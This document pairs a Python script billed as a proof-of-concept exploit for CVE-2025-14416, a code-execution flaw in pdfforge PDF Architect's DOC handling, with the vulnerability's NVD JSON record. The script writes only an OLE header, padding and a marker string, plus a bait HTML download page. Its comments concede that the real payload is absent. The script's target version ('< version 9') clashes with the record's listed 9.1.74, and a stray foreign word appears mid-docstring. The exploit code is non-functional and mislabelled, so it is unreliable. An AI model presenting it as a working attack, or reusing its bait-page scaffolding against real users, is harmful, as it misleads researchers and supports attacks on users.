CVE-2025-14416

#!/usr/bin/env python3 """ CVE-2025-14416 PoC - pdfforge PDF Architect DOC File RCE This PoC demonstrates the vulnerability in PDF Architect's DOC file handling. Note: This is for educational and security research purposes only. """ import struct import os def create_malicious_doc(output_path): """ Create a malicious DOC file that exploits CVE-2025-14416 The file contains embedded content that triggers code execution without proper user warning in vulnerable PDF Architect versions. """ # DOC file magic bytes (OLE compound document) ole_header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1' # Minimal OLE structure for a DOC file ole_data = ole_header + b'\x00' * 512 # Add malicious payload marker # In real exploitation, this would contain actual malicious code/commands payload = b'CVE-2025-14416_EXPLOIT_PAYLOAD' # Create the malicious DOC file with open(output_path, 'wb') as f: f.write(ole_data) f.write(payload) print(f"[+] Malicious DOC file created: {output_path}") print(f"[!] When opened in vulnerable PDF Architect, the embedded content") print(f"[!] will be processed without proper security warnings.") def create_malicious_page(html_path): """ Create a malicious HTML page that triggers the vulnerability through browser-based file handling or download诱导. """ html_content = '''<!DOCTYPE html> <html> <head> <title>CVE-2025-14416 Test Page</title> </head> <body> <h1>Download Malicious Document</h1> <p>Click below to download the crafted DOC file:</p> <a href="malicious.doc" download>Download File</a> <script> // In real attack scenario, this would automatically trigger download // and potentially exploit the vulnerability through file handling console.log("CVE-2025-14416: Malicious page loaded"); </script> </body> </html>''' with open(html_path, 'w') as f: f.write(html_content) print(f"[+] Malicious page created: {html_path}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-14416 PoC Generator") print("Target: pdfforge PDF Architect < version 9") print("=" * 60) # Generate malicious DOC file create_malicious_doc("CVE-2025-14416.doc") # Generate malicious page create_malicious_page("exploit_page.html") print("\n[!] DISCLAIMER: This PoC is for research purposes only.") print("[!] Do not use for unauthorized testing or attacks.")

{"cve": {"id": "CVE-2025-14416", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.517", "lastModified": "2026-01-02T21:55:14.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27503."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1073/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}